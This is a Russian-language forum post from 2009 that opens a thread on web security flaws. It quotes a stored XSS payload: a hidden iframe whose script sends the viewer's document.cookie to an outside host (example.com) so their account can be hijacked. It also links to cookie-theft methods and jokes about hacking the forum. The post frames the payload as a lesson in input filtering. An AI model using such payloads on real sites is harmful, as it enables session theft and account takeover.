Показать сообщение отдельно
Старый 08.08.2009, 16:58   #1 (Ссылка на пост)
TIGR
Щас сменю себе статус
 
Аватар для TIGR
Пол:
 
Активность Longevity
0/20 18/20
Today Сообщения
0/5 sssss4687
Благодарил(а): 9,926
Благодарили 6,148 раз в 2,096 постах
Галерея: 0
Вес репутации: 82 TIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторыTIGR скоро в модераторы
Взломать сайт пентагона

предлагаю пообсуждать вопросы связанные с безопасностью. Если встретите кидайте интересные XSS-уязвимости, поломаные сайты и программы(необязательно взломаные) - у меня где то хранится скрин как упал сайт микрософта и т.п.

покажу простой скрипт для примера важности фильтровать вводимые данные, пример из жизни, казалось бы профессиональная группа програмистов - но поля ввода не проверяет...

Цитата:
<iframe width=0 height=0 id="asd" src="example.com"></iframe>
<script>
var iframe = document.getElementById('asd');
iframe.src='example.com?cookie=' + document.cookie;
</script>
и когда информация из этого поля просматривал какой-либо пользователь то его аккаунт переходил в чужие руки.

второй пример можно сказать аналогичен предыдущему только жертва сама отдаёт нужную инфу
Цитата:
http://ekimoff.ru/35/
человек вроде бы пытается помочь всем, но никто не обращает внимания на внутренности скрипта!!

ну и напоследок тоже популярный способ получения кук.
Цитата:
http://habrahabr.ru/blogs/infosecurity/63819/
ну и да, конечно! ломаем форум нормы надо ж когда-нибудь выполнить мечту забаненого.
__________________
TIGR вне форума  
Ответить с цитированием